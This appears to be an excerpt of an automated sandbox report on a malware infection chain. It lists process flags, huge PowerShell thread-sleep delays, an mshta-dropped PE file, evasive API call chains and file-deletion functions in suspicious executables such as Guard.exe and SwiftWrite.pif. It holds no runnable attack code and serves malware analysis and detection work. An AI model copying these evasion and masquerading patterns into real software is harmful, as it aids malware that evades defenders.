Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1528Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1868Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1038Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 424Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4027Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5676Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1246
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2411
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]Jump to dropped file
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeAPI coverage: 3.8 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 1038 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 424 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7320Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6796Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6288Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460Thread sleep count: 6766 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464Thread sleep count: 2411 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8476Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_00007FF7ADC7C7C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC42F50 FindFirstFileExW,15_2_00007FF7ADC42F50
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_00007FF7ADC8A874
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7ADC8A4F8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC86428 FindFirstFileW,FindNextFileW,FindClose,15_2_00007FF7ADC86428
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7ADC8A350
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7ADC7BC70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7ADC7B7C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC872A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_00007FF7ADC872A8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC871F4 FindFirstFileW,FindClose,15_2_00007FF7ADC871F4
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00BB4005
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_00BB494A
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00BBC2FF
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00BBCD9F
